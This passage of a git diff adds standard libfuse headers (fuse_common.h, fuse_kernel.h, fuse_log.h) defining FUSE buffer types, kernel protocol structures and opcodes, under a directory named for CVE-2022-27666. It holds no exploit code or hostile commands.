+ * + * The following options are recognized: + * + * -o max_write=N sets conn->max_write + * -o max_readahead=N sets conn->max_readahead + * -o max_background=N sets conn->max_background + * -o congestion_threshold=N sets conn->congestion_threshold + * -o async_read sets FUSE_CAP_ASYNC_READ in conn->want + * -o sync_read unsets FUSE_CAP_ASYNC_READ in conn->want + * -o atomic_o_trunc sets FUSE_CAP_ATOMIC_O_TRUNC in conn->want + * -o no_remote_lock Equivalent to -o no_remote_flock,no_remote_posix_lock + * -o no_remote_flock Unsets FUSE_CAP_FLOCK_LOCKS in conn->want + * -o no_remote_posix_lock Unsets FUSE_CAP_POSIX_LOCKS in conn->want + * -o [no_]splice_write (un-)sets FUSE_CAP_SPLICE_WRITE in conn->want + * -o [no_]splice_move (un-)sets FUSE_CAP_SPLICE_MOVE in conn->want + * -o [no_]splice_read (un-)sets FUSE_CAP_SPLICE_READ in conn->want + * -o [no_]auto_inval_data (un-)sets FUSE_CAP_AUTO_INVAL_DATA in conn->want + * -o readdirplus=no unsets FUSE_CAP_READDIRPLUS in conn->want + * -o readdirplus=yes sets FUSE_CAP_READDIRPLUS and unsets + * FUSE_CAP_READDIRPLUS_AUTO in conn->want + * -o readdirplus=auto sets FUSE_CAP_READDIRPLUS and + * FUSE_CAP_READDIRPLUS_AUTO in conn->want + * -o [no_]async_dio (un-)sets FUSE_CAP_ASYNC_DIO in conn->want + * -o [no_]writeback_cache (un-)sets FUSE_CAP_WRITEBACK_CACHE in conn->want + * -o time_gran=N sets conn->time_gran + * + * Known options will be removed from *args*, unknown options will be + * passed through unchanged. + * + * @param args argument vector (input+output) + * @return parsed options + **/ +struct fuse_conn_info_opts* fuse_parse_conn_info_opts(struct fuse_args *args); + +/** + * This function applies the (parsed) parameters in *opts* to the + * *conn* pointer. It may modify the following fields: want, + * max_write, max_readahead, congestion_threshold, max_background, + * time_gran. A field is only set (or unset) if the corresponding + * option has been explicitly set.
+ */ +void fuse_apply_conn_info_opts(struct fuse_conn_info_opts *opts, + struct fuse_conn_info *conn); + +/** + * Go into the background + * + * @param foreground if true, stay in the foreground + * @return 0 on success, -1 on failure + */ +int fuse_daemonize(int foreground); + +/** + * Get the version of the library + * + * @return the version + */ +int fuse_version(void); + +/** + * Get the full package version string of the library + * + * @return the package version + */ +const char *fuse_pkgversion(void); + +/** + * Destroy poll handle + * + * @param ph the poll handle + */ +void fuse_pollhandle_destroy(struct fuse_pollhandle *ph); + +/* ----------------------------------------------------------- * + * Data buffer * + * ----------------------------------------------------------- */ + +/** + * Buffer flags + */ +enum fuse_buf_flags { + /** + * Buffer contains a file descriptor + * + * If this flag is set, the .fd field is valid, otherwise the + * .mem field is valid. + */ + FUSE_BUF_IS_FD = (1 << 1), + + /** + * Seek on the file descriptor + * + * If this flag is set then the .pos field is valid and is + * used to seek to the given offset before performing + * operation on file descriptor. + */ + FUSE_BUF_FD_SEEK = (1 << 2), + + /** + * Retry operation on file descriptor + * + * If this flag is set then retry operation on file descriptor + * until .size bytes have been copied or an error or EOF is + * detected. + */ + FUSE_BUF_FD_RETRY = (1 << 3) +}; + +/** + * Buffer copy flags + */ +enum fuse_buf_copy_flags { + /** + * Don't use splice(2) + * + * Always fall back to using read and write instead of + * splice(2) to copy data from one file descriptor to another. + * + * If this flag is not set, then only fall back if splice is + * unavailable. + */ + FUSE_BUF_NO_SPLICE = (1 << 1), + + /** + * Force splice + * + * Always use splice(2) to copy data from one file descriptor + * to another. If splice is not available, return -EINVAL.
+ */ + FUSE_BUF_FORCE_SPLICE = (1 << 2), + + /** + * Try to move data with splice. + * + * If splice is used, try to move pages from the source to the + * destination instead of copying. See documentation of + * SPLICE_F_MOVE in splice(2) man page. + */ + FUSE_BUF_SPLICE_MOVE = (1 << 3), + + /** + * Don't block on the pipe when copying data with splice + * + * Makes the operations on the pipe non-blocking (if the pipe + * is full or empty). See SPLICE_F_NONBLOCK in the splice(2) + * man page. + */ + FUSE_BUF_SPLICE_NONBLOCK= (1 << 4) +}; + +/** + * Single data buffer + * + * Generic data buffer for I/O, extended attributes, etc... Data may + * be supplied as a memory pointer or as a file descriptor + */ +struct fuse_buf { + /** + * Size of data in bytes + */ + size_t size; + + /** + * Buffer flags + */ + enum fuse_buf_flags flags; + + /** + * Memory pointer + * + * Used unless FUSE_BUF_IS_FD flag is set. + */ + void *mem; + + /** + * File descriptor + * + * Used if FUSE_BUF_IS_FD flag is set. + */ + int fd; + + /** + * File position + * + * Used if FUSE_BUF_FD_SEEK flag is set. + */ + off_t pos; +}; + +/** + * Data buffer vector + * + * An array of data buffers, each containing a memory pointer or a + * file descriptor. + * + * Allocate dynamically to add more than one buffer. 
+ */ +struct fuse_bufvec { + /** + * Number of buffers in the array + */ + size_t count; + + /** + * Index of current buffer within the array + */ + size_t idx; + + /** + * Current offset within the current buffer + */ + size_t off; + + /** + * Array of buffers + */ + struct fuse_buf buf[1]; +}; + +/* Initialize bufvec with a single buffer of given size */ +#define FUSE_BUFVEC_INIT(size__) \ + ((struct fuse_bufvec) { \ + /* .count= */ 1, \ + /* .idx = */ 0, \ + /* .off = */ 0, \ + /* .buf = */ { /* [0] = */ { \ + /* .size = */ (size__), \ + /* .flags = */ (enum fuse_buf_flags) 0, \ + /* .mem = */ NULL, \ + /* .fd = */ -1, \ + /* .pos = */ 0, \ + } } \ + } ) + +/** + * Get total size of data in a fuse buffer vector + * + * @param bufv buffer vector + * @return size of data + */ +size_t fuse_buf_size(const struct fuse_bufvec *bufv); + +/** + * Copy data from one buffer vector to another + * + * @param dst destination buffer vector + * @param src source buffer vector + * @param flags flags controlling the copy + * @return actual number of bytes copied or -errno on error + */ +ssize_t fuse_buf_copy(struct fuse_bufvec *dst, struct fuse_bufvec *src, + enum fuse_buf_copy_flags flags); + +/* ----------------------------------------------------------- * + * Signal handling * + * ----------------------------------------------------------- */ + +/** + * Exit session on HUP, TERM and INT signals and ignore PIPE signal + * + * Stores session in a global variable. May only be called once per + * process until fuse_remove_signal_handlers() is called. + * + * Once either of the POSIX signals arrives, the signal handler calls + * fuse_session_exit(). + * + * @param se the session to exit + * @return 0 on success, -1 on failure + * + * See also: + * fuse_remove_signal_handlers() + */ +int fuse_set_signal_handlers(struct fuse_session *se); + +/** + * Restore default signal handlers + * + * Resets global session. After this fuse_set_signal_handlers() may + * be called again. 
+ * + * @param se the same session as given in fuse_set_signal_handlers() + * + * See also: + * fuse_set_signal_handlers() + */ +void fuse_remove_signal_handlers(struct fuse_session *se); + +/* ----------------------------------------------------------- * + * Compatibility stuff * + * ----------------------------------------------------------- */ + +#if !defined(FUSE_USE_VERSION) || FUSE_USE_VERSION < 30 +# error only API version 30 or greater is supported +#endif + +#ifdef __cplusplus +} +#endif + + +/* + * This interface uses 64 bit off_t. + * + * On 32bit systems please add -D_FILE_OFFSET_BITS=64 to your compile flags! + */ + +#if defined(__GNUC__) && (__GNUC__ > 4 || __GNUC__ == 4 && __GNUC_MINOR__ >= 6) && !defined __cplusplus +_Static_assert(sizeof(off_t) == 8, "fuse: off_t must be 64bit"); +#else +struct _fuse_off_t_must_be_64bit_dummy_struct \ + { unsigned _fuse_off_t_must_be_64bit:((sizeof(off_t) == 8) ? 1 : -1); }; +#endif + +#endif /* FUSE_COMMON_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_kernel.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_kernel.h new file mode 100644 index 0000000000000000000000000000000000000000..018a00a2da0ff502ab043bc2f62e1025915c4129 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_kernel.h @@ -0,0 +1,848 @@ +/* SPDX-License-Identifier: ((GPL-2.0 WITH Linux-syscall-note) OR BSD-2-Clause) */ +/* + This file defines the kernel interface of FUSE + Copyright (C) 2001-2008 Miklos Szeredi + + This program can be distributed under the terms of the GNU GPL. + See the file COPYING. + + This -- and only this -- header file may also be distributed under + the terms of the BSD Licence as follows: + + Copyright (C) 2001-2007 Miklos Szeredi. All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions + are met: + 1. 
Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + THIS SOFTWARE IS PROVIDED BY AUTHOR AND CONTRIBUTORS ``AS IS'' AND + ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + ARE DISCLAIMED. IN NO EVENT SHALL AUTHOR OR CONTRIBUTORS BE LIABLE + FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + SUCH DAMAGE. 
+*/ + +/* + * This file defines the kernel interface of FUSE + * + * Protocol changelog: + * + * 7.9: + * - new fuse_getattr_in input argument of GETATTR + * - add lk_flags in fuse_lk_in + * - add lock_owner field to fuse_setattr_in, fuse_read_in and fuse_write_in + * - add blksize field to fuse_attr + * - add file flags field to fuse_read_in and fuse_write_in + * - Add ATIME_NOW and MTIME_NOW flags to fuse_setattr_in + * + * 7.10 + * - add nonseekable open flag + * + * 7.11 + * - add IOCTL message + * - add unsolicited notification support + * - add POLL message and NOTIFY_POLL notification + * + * 7.12 + * - add umask flag to input argument of create, mknod and mkdir + * - add notification messages for invalidation of inodes and + * directory entries + * + * 7.13 + * - make max number of background requests and congestion threshold + * tunables + * + * 7.14 + * - add splice support to fuse device + * + * 7.15 + * - add store notify + * - add retrieve notify + * + * 7.16 + * - add BATCH_FORGET request + * - FUSE_IOCTL_UNRESTRICTED shall now return with array of 'struct + * fuse_ioctl_iovec' instead of ambiguous 'struct iovec' + * - add FUSE_IOCTL_32BIT flag + * + * 7.17 + * - add FUSE_FLOCK_LOCKS and FUSE_RELEASE_FLOCK_UNLOCK + * + * 7.18 + * - add FUSE_IOCTL_DIR flag + * - add FUSE_NOTIFY_DELETE + * + * 7.19 + * - add FUSE_FALLOCATE + * + * 7.20 + * - add FUSE_AUTO_INVAL_DATA + * + * 7.21 + * - add FUSE_READDIRPLUS + * - send the requested events in POLL request + * + * 7.22 + * - add FUSE_ASYNC_DIO + * + * 7.23 + * - add FUSE_WRITEBACK_CACHE + * - add time_gran to fuse_init_out + * - add reserved space to fuse_init_out + * - add FATTR_CTIME + * - add ctime and ctimensec to fuse_setattr_in + * - add FUSE_RENAME2 request + * - add FUSE_NO_OPEN_SUPPORT flag + * + * 7.24 + * - add FUSE_LSEEK for SEEK_HOLE and SEEK_DATA support + * + * 7.25 + * - add FUSE_PARALLEL_DIROPS + * + * 7.26 + * - add FUSE_HANDLE_KILLPRIV + * - add FUSE_POSIX_ACL + * + * 7.27 + * - add 
FUSE_ABORT_ERROR + * + * 7.28 + * - add FUSE_COPY_FILE_RANGE + * - add FOPEN_CACHE_DIR + * - add FUSE_MAX_PAGES, add max_pages to init_out + * - add FUSE_CACHE_SYMLINKS + * + * 7.29 + * - add FUSE_NO_OPENDIR_SUPPORT flag + * + * 7.30 + * - add FUSE_EXPLICIT_INVAL_DATA + * - add FUSE_IOCTL_COMPAT_X32 + * + * 7.31 + * - add FUSE_WRITE_KILL_PRIV flag + */ + +#ifndef _LINUX_FUSE_H +#define _LINUX_FUSE_H + +#ifdef __KERNEL__ +#include +#else +#include +#endif + +/* + * Version negotiation: + * + * Both the kernel and userspace send the version they support in the + * INIT request and reply respectively. + * + * If the major versions match then both shall use the smallest + * of the two minor versions for communication. + * + * If the kernel supports a larger major version, then userspace shall + * reply with the major version it supports, ignore the rest of the + * INIT message and expect a new INIT message from the kernel with a + * matching major version. + * + * If the library supports a larger major version, then it shall fall + * back to the major protocol version sent by the kernel for + * communication and reply with that major version (and an arbitrary + * supported minor version). 
+ */ + +/** Version number of this interface */ +#define FUSE_KERNEL_VERSION 7 + +/** Minor version number of this interface */ +#define FUSE_KERNEL_MINOR_VERSION 31 + +/** The node ID of the root inode */ +#define FUSE_ROOT_ID 1 + +/* Make sure all structures are padded to 64bit boundary, so 32bit + userspace works under 64bit kernels */ + +struct fuse_attr { + uint64_t ino; + uint64_t size; + uint64_t blocks; + uint64_t atime; + uint64_t mtime; + uint64_t ctime; + uint32_t atimensec; + uint32_t mtimensec; + uint32_t ctimensec; + uint32_t mode; + uint32_t nlink; + uint32_t uid; + uint32_t gid; + uint32_t rdev; + uint32_t blksize; + uint32_t padding; +}; + +struct fuse_kstatfs { + uint64_t blocks; + uint64_t bfree; + uint64_t bavail; + uint64_t files; + uint64_t ffree; + uint32_t bsize; + uint32_t namelen; + uint32_t frsize; + uint32_t padding; + uint32_t spare[6]; +}; + +struct fuse_file_lock { + uint64_t start; + uint64_t end; + uint32_t type; + uint32_t pid; /* tgid */ +}; + +/** + * Bitmasks for fuse_setattr_in.valid + */ +#define FATTR_MODE (1 << 0) +#define FATTR_UID (1 << 1) +#define FATTR_GID (1 << 2) +#define FATTR_SIZE (1 << 3) +#define FATTR_ATIME (1 << 4) +#define FATTR_MTIME (1 << 5) +#define FATTR_FH (1 << 6) +#define FATTR_ATIME_NOW (1 << 7) +#define FATTR_MTIME_NOW (1 << 8) +#define FATTR_LOCKOWNER (1 << 9) +#define FATTR_CTIME (1 << 10) + +/** + * Flags returned by the OPEN request + * + * FOPEN_DIRECT_IO: bypass page cache for this open file + * FOPEN_KEEP_CACHE: don't invalidate the data cache on open + * FOPEN_NONSEEKABLE: the file is not seekable + * FOPEN_CACHE_DIR: allow caching this directory + * FOPEN_STREAM: the file is stream-like (no file position at all) + */ +#define FOPEN_DIRECT_IO (1 << 0) +#define FOPEN_KEEP_CACHE (1 << 1) +#define FOPEN_NONSEEKABLE (1 << 2) +#define FOPEN_CACHE_DIR (1 << 3) +#define FOPEN_STREAM (1 << 4) + +/** + * INIT request/reply flags + * + * FUSE_ASYNC_READ: asynchronous read requests + * FUSE_POSIX_LOCKS: 
remote locking for POSIX file locks + * FUSE_FILE_OPS: kernel sends file handle for fstat, etc... (not yet supported) + * FUSE_ATOMIC_O_TRUNC: handles the O_TRUNC open flag in the filesystem + * FUSE_EXPORT_SUPPORT: filesystem handles lookups of "." and ".." + * FUSE_BIG_WRITES: filesystem can handle write size larger than 4kB + * FUSE_DONT_MASK: don't apply umask to file mode on create operations + * FUSE_SPLICE_WRITE: kernel supports splice write on the device + * FUSE_SPLICE_MOVE: kernel supports splice move on the device + * FUSE_SPLICE_READ: kernel supports splice read on the device + * FUSE_FLOCK_LOCKS: remote locking for BSD style file locks + * FUSE_HAS_IOCTL_DIR: kernel supports ioctl on directories + * FUSE_AUTO_INVAL_DATA: automatically invalidate cached pages + * FUSE_DO_READDIRPLUS: do READDIRPLUS (READDIR+LOOKUP in one) + * FUSE_READDIRPLUS_AUTO: adaptive readdirplus + * FUSE_ASYNC_DIO: asynchronous direct I/O submission + * FUSE_WRITEBACK_CACHE: use writeback cache for buffered writes + * FUSE_NO_OPEN_SUPPORT: kernel supports zero-message opens + * FUSE_PARALLEL_DIROPS: allow parallel lookups and readdir + * FUSE_HANDLE_KILLPRIV: fs handles killing suid/sgid/cap on write/chown/trunc + * FUSE_POSIX_ACL: filesystem supports posix acls + * FUSE_ABORT_ERROR: reading the device after abort returns ECONNABORTED + * FUSE_MAX_PAGES: init_out.max_pages contains the max number of req pages + * FUSE_CACHE_SYMLINKS: cache READLINK responses + * FUSE_NO_OPENDIR_SUPPORT: kernel supports zero-message opendir + * FUSE_EXPLICIT_INVAL_DATA: only invalidate cached pages on explicit request + */ +#define FUSE_ASYNC_READ (1 << 0) +#define FUSE_POSIX_LOCKS (1 << 1) +#define FUSE_FILE_OPS (1 << 2) +#define FUSE_ATOMIC_O_TRUNC (1 << 3) +#define FUSE_EXPORT_SUPPORT (1 << 4) +#define FUSE_BIG_WRITES (1 << 5) +#define FUSE_DONT_MASK (1 << 6) +#define FUSE_SPLICE_WRITE (1 << 7) +#define FUSE_SPLICE_MOVE (1 << 8) +#define FUSE_SPLICE_READ (1 << 9) +#define FUSE_FLOCK_LOCKS (1 << 
10) +#define FUSE_HAS_IOCTL_DIR (1 << 11) +#define FUSE_AUTO_INVAL_DATA (1 << 12) +#define FUSE_DO_READDIRPLUS (1 << 13) +#define FUSE_READDIRPLUS_AUTO (1 << 14) +#define FUSE_ASYNC_DIO (1 << 15) +#define FUSE_WRITEBACK_CACHE (1 << 16) +#define FUSE_NO_OPEN_SUPPORT (1 << 17) +#define FUSE_PARALLEL_DIROPS (1 << 18) +#define FUSE_HANDLE_KILLPRIV (1 << 19) +#define FUSE_POSIX_ACL (1 << 20) +#define FUSE_ABORT_ERROR (1 << 21) +#define FUSE_MAX_PAGES (1 << 22) +#define FUSE_CACHE_SYMLINKS (1 << 23) +#define FUSE_NO_OPENDIR_SUPPORT (1 << 24) +#define FUSE_EXPLICIT_INVAL_DATA (1 << 25) + +/** + * CUSE INIT request/reply flags + * + * CUSE_UNRESTRICTED_IOCTL: use unrestricted ioctl + */ +#define CUSE_UNRESTRICTED_IOCTL (1 << 0) + +/** + * Release flags + */ +#define FUSE_RELEASE_FLUSH (1 << 0) +#define FUSE_RELEASE_FLOCK_UNLOCK (1 << 1) + +/** + * Getattr flags + */ +#define FUSE_GETATTR_FH (1 << 0) + +/** + * Lock flags + */ +#define FUSE_LK_FLOCK (1 << 0) + +/** + * WRITE flags + * + * FUSE_WRITE_CACHE: delayed write from page cache, file handle is guessed + * FUSE_WRITE_LOCKOWNER: lock_owner field is valid + * FUSE_WRITE_KILL_PRIV: kill suid and sgid bits + */ +#define FUSE_WRITE_CACHE (1 << 0) +#define FUSE_WRITE_LOCKOWNER (1 << 1) +#define FUSE_WRITE_KILL_PRIV (1 << 2) + +/** + * Read flags + */ +#define FUSE_READ_LOCKOWNER (1 << 1) + +/** + * Ioctl flags + * + * FUSE_IOCTL_COMPAT: 32bit compat ioctl on 64bit machine + * FUSE_IOCTL_UNRESTRICTED: not restricted to well-formed ioctls, retry allowed + * FUSE_IOCTL_RETRY: retry with new iovecs + * FUSE_IOCTL_32BIT: 32bit ioctl + * FUSE_IOCTL_DIR: is a directory + * FUSE_IOCTL_COMPAT_X32: x32 compat ioctl on 64bit machine (64bit time_t) + * + * FUSE_IOCTL_MAX_IOV: maximum of in_iovecs + out_iovecs + */ +#define FUSE_IOCTL_COMPAT (1 << 0) +#define FUSE_IOCTL_UNRESTRICTED (1 << 1) +#define FUSE_IOCTL_RETRY (1 << 2) +#define FUSE_IOCTL_32BIT (1 << 3) +#define FUSE_IOCTL_DIR (1 << 4) +#define FUSE_IOCTL_COMPAT_X32 (1 << 5) + 
+#define FUSE_IOCTL_MAX_IOV 256 + +/** + * Poll flags + * + * FUSE_POLL_SCHEDULE_NOTIFY: request poll notify + */ +#define FUSE_POLL_SCHEDULE_NOTIFY (1 << 0) + +/** + * Fsync flags + * + * FUSE_FSYNC_FDATASYNC: Sync data only, not metadata + */ +#define FUSE_FSYNC_FDATASYNC (1 << 0) + +enum fuse_opcode { + FUSE_LOOKUP = 1, + FUSE_FORGET = 2, /* no reply */ + FUSE_GETATTR = 3, + FUSE_SETATTR = 4, + FUSE_READLINK = 5, + FUSE_SYMLINK = 6, + FUSE_MKNOD = 8, + FUSE_MKDIR = 9, + FUSE_UNLINK = 10, + FUSE_RMDIR = 11, + FUSE_RENAME = 12, + FUSE_LINK = 13, + FUSE_OPEN = 14, + FUSE_READ = 15, + FUSE_WRITE = 16, + FUSE_STATFS = 17, + FUSE_RELEASE = 18, + FUSE_FSYNC = 20, + FUSE_SETXATTR = 21, + FUSE_GETXATTR = 22, + FUSE_LISTXATTR = 23, + FUSE_REMOVEXATTR = 24, + FUSE_FLUSH = 25, + FUSE_INIT = 26, + FUSE_OPENDIR = 27, + FUSE_READDIR = 28, + FUSE_RELEASEDIR = 29, + FUSE_FSYNCDIR = 30, + FUSE_GETLK = 31, + FUSE_SETLK = 32, + FUSE_SETLKW = 33, + FUSE_ACCESS = 34, + FUSE_CREATE = 35, + FUSE_INTERRUPT = 36, + FUSE_BMAP = 37, + FUSE_DESTROY = 38, + FUSE_IOCTL = 39, + FUSE_POLL = 40, + FUSE_NOTIFY_REPLY = 41, + FUSE_BATCH_FORGET = 42, + FUSE_FALLOCATE = 43, + FUSE_READDIRPLUS = 44, + FUSE_RENAME2 = 45, + FUSE_LSEEK = 46, + FUSE_COPY_FILE_RANGE = 47, + + /* CUSE specific operations */ + CUSE_INIT = 4096 +}; + +enum fuse_notify_code { + FUSE_NOTIFY_POLL = 1, + FUSE_NOTIFY_INVAL_INODE = 2, + FUSE_NOTIFY_INVAL_ENTRY = 3, + FUSE_NOTIFY_STORE = 4, + FUSE_NOTIFY_RETRIEVE = 5, + FUSE_NOTIFY_DELETE = 6, + FUSE_NOTIFY_CODE_MAX +}; + +/* The read buffer is required to be at least 8k, but may be much larger */ +#define FUSE_MIN_READ_BUFFER 8192 + +#define FUSE_COMPAT_ENTRY_OUT_SIZE 120 + +struct fuse_entry_out { + uint64_t nodeid; /* Inode ID */ + uint64_t generation; /* Inode generation: nodeid:gen must + be unique for the fs's lifetime */ + uint64_t entry_valid; /* Cache timeout for the name */ + uint64_t attr_valid; /* Cache timeout for the attributes */ + uint32_t entry_valid_nsec; + 
uint32_t attr_valid_nsec; + struct fuse_attr attr; +}; + +struct fuse_forget_in { + uint64_t nlookup; +}; + +struct fuse_forget_one { + uint64_t nodeid; + uint64_t nlookup; +}; + +struct fuse_batch_forget_in { + uint32_t count; + uint32_t dummy; +}; + +struct fuse_getattr_in { + uint32_t getattr_flags; + uint32_t dummy; + uint64_t fh; +}; + +#define FUSE_COMPAT_ATTR_OUT_SIZE 96 + +struct fuse_attr_out { + uint64_t attr_valid; /* Cache timeout for the attributes */ + uint32_t attr_valid_nsec; + uint32_t dummy; + struct fuse_attr attr; +}; + +#define FUSE_COMPAT_MKNOD_IN_SIZE 8 + +struct fuse_mknod_in { + uint32_t mode; + uint32_t rdev; + uint32_t umask; + uint32_t padding; +}; + +struct fuse_mkdir_in { + uint32_t mode; + uint32_t umask; +}; + +struct fuse_rename_in { + uint64_t newdir; +}; + +struct fuse_rename2_in { + uint64_t newdir; + uint32_t flags; + uint32_t padding; +}; + +struct fuse_link_in { + uint64_t oldnodeid; +}; + +struct fuse_setattr_in { + uint32_t valid; + uint32_t padding; + uint64_t fh; + uint64_t size; + uint64_t lock_owner; + uint64_t atime; + uint64_t mtime; + uint64_t ctime; + uint32_t atimensec; + uint32_t mtimensec; + uint32_t ctimensec; + uint32_t mode; + uint32_t unused4; + uint32_t uid; + uint32_t gid; + uint32_t unused5; +}; + +struct fuse_open_in { + uint32_t flags; + uint32_t unused; +}; + +struct fuse_create_in { + uint32_t flags; + uint32_t mode; + uint32_t umask; + uint32_t padding; +}; + +struct fuse_open_out { + uint64_t fh; + uint32_t open_flags; + uint32_t padding; +}; + +struct fuse_release_in { + uint64_t fh; + uint32_t flags; + uint32_t release_flags; + uint64_t lock_owner; +}; + +struct fuse_flush_in { + uint64_t fh; + uint32_t unused; + uint32_t padding; + uint64_t lock_owner; +}; + +struct fuse_read_in { + uint64_t fh; + uint64_t offset; + uint32_t size; + uint32_t read_flags; + uint64_t lock_owner; + uint32_t flags; + uint32_t padding; +}; + +#define FUSE_COMPAT_WRITE_IN_SIZE 24 + +struct fuse_write_in { + uint64_t fh; + 
uint64_t offset; + uint32_t size; + uint32_t write_flags; + uint64_t lock_owner; + uint32_t flags; + uint32_t padding; +}; + +struct fuse_write_out { + uint32_t size; + uint32_t padding; +}; + +#define FUSE_COMPAT_STATFS_SIZE 48 + +struct fuse_statfs_out { + struct fuse_kstatfs st; +}; + +struct fuse_fsync_in { + uint64_t fh; + uint32_t fsync_flags; + uint32_t padding; +}; + +struct fuse_setxattr_in { + uint32_t size; + uint32_t flags; +}; + +struct fuse_getxattr_in { + uint32_t size; + uint32_t padding; +}; + +struct fuse_getxattr_out { + uint32_t size; + uint32_t padding; +}; + +struct fuse_lk_in { + uint64_t fh; + uint64_t owner; + struct fuse_file_lock lk; + uint32_t lk_flags; + uint32_t padding; +}; + +struct fuse_lk_out { + struct fuse_file_lock lk; +}; + +struct fuse_access_in { + uint32_t mask; + uint32_t padding; +}; + +struct fuse_init_in { + uint32_t major; + uint32_t minor; + uint32_t max_readahead; + uint32_t flags; +}; + +#define FUSE_COMPAT_INIT_OUT_SIZE 8 +#define FUSE_COMPAT_22_INIT_OUT_SIZE 24 + +struct fuse_init_out { + uint32_t major; + uint32_t minor; + uint32_t max_readahead; + uint32_t flags; + uint16_t max_background; + uint16_t congestion_threshold; + uint32_t max_write; + uint32_t time_gran; + uint16_t max_pages; + uint16_t padding; + uint32_t unused[8]; +}; + +#define CUSE_INIT_INFO_MAX 4096 + +struct cuse_init_in { + uint32_t major; + uint32_t minor; + uint32_t unused; + uint32_t flags; +}; + +struct cuse_init_out { + uint32_t major; + uint32_t minor; + uint32_t unused; + uint32_t flags; + uint32_t max_read; + uint32_t max_write; + uint32_t dev_major; /* chardev major */ + uint32_t dev_minor; /* chardev minor */ + uint32_t spare[10]; +}; + +struct fuse_interrupt_in { + uint64_t unique; +}; + +struct fuse_bmap_in { + uint64_t block; + uint32_t blocksize; + uint32_t padding; +}; + +struct fuse_bmap_out { + uint64_t block; +}; + +struct fuse_ioctl_in { + uint64_t fh; + uint32_t flags; + uint32_t cmd; + uint64_t arg; + uint32_t in_size; + 
uint32_t out_size; +}; + +struct fuse_ioctl_iovec { + uint64_t base; + uint64_t len; +}; + +struct fuse_ioctl_out { + int32_t result; + uint32_t flags; + uint32_t in_iovs; + uint32_t out_iovs; +}; + +struct fuse_poll_in { + uint64_t fh; + uint64_t kh; + uint32_t flags; + uint32_t events; +}; + +struct fuse_poll_out { + uint32_t revents; + uint32_t padding; +}; + +struct fuse_notify_poll_wakeup_out { + uint64_t kh; +}; + +struct fuse_fallocate_in { + uint64_t fh; + uint64_t offset; + uint64_t length; + uint32_t mode; + uint32_t padding; +}; + +struct fuse_in_header { + uint32_t len; + uint32_t opcode; + uint64_t unique; + uint64_t nodeid; + uint32_t uid; + uint32_t gid; + uint32_t pid; + uint32_t padding; +}; + +struct fuse_out_header { + uint32_t len; + int32_t error; + uint64_t unique; +}; + +struct fuse_dirent { + uint64_t ino; + uint64_t off; + uint32_t namelen; + uint32_t type; + char name[]; +}; + +#define FUSE_NAME_OFFSET offsetof(struct fuse_dirent, name) +#define FUSE_DIRENT_ALIGN(x) \ + (((x) + sizeof(uint64_t) - 1) & ~(sizeof(uint64_t) - 1)) +#define FUSE_DIRENT_SIZE(d) \ + FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET + (d)->namelen) + +struct fuse_direntplus { + struct fuse_entry_out entry_out; + struct fuse_dirent dirent; +}; + +#define FUSE_NAME_OFFSET_DIRENTPLUS \ + offsetof(struct fuse_direntplus, dirent.name) +#define FUSE_DIRENTPLUS_SIZE(d) \ + FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET_DIRENTPLUS + (d)->dirent.namelen) + +struct fuse_notify_inval_inode_out { + uint64_t ino; + int64_t off; + int64_t len; +}; + +struct fuse_notify_inval_entry_out { + uint64_t parent; + uint32_t namelen; + uint32_t padding; +}; + +struct fuse_notify_delete_out { + uint64_t parent; + uint64_t child; + uint32_t namelen; + uint32_t padding; +}; + +struct fuse_notify_store_out { + uint64_t nodeid; + uint64_t offset; + uint32_t size; + uint32_t padding; +}; + +struct fuse_notify_retrieve_out { + uint64_t notify_unique; + uint64_t nodeid; + uint64_t offset; + uint32_t size; + uint32_t 
padding; +}; + +/* Matches the size of fuse_write_in */ +struct fuse_notify_retrieve_in { + uint64_t dummy1; + uint64_t offset; + uint32_t size; + uint32_t dummy2; + uint64_t dummy3; + uint64_t dummy4; +}; + +/* Device ioctls: */ +#define FUSE_DEV_IOC_CLONE _IOR(229, 0, uint32_t) + +struct fuse_lseek_in { + uint64_t fh; + uint64_t offset; + uint32_t whence; + uint32_t padding; +}; + +struct fuse_lseek_out { + uint64_t offset; +}; + +struct fuse_copy_file_range_in { + uint64_t fh_in; + uint64_t off_in; + uint64_t nodeid_out; + uint64_t fh_out; + uint64_t off_out; + uint64_t len; + uint64_t flags; +}; + +#endif /* _LINUX_FUSE_H */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_log.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_log.h new file mode 100644 index 0000000000000000000000000000000000000000..5e112e0f5343c7f8e2e75160c8e60bccd3b8037e --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_log.h @@ -0,0 +1,82 @@ +/* + FUSE: Filesystem in Userspace + Copyright (C) 2019 Red Hat, Inc. + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +#ifndef FUSE_LOG_H_ +#define FUSE_LOG_H_ + +/** @file + * + * This file defines the logging interface of FUSE + */ + +#include + +#ifdef __cplusplus +extern "C" { +#endif + +/** + * Log severity level + * + * These levels correspond to syslog(2) log levels since they are widely used. + */ +enum fuse_log_level { + FUSE_LOG_EMERG, + FUSE_LOG_ALERT, + 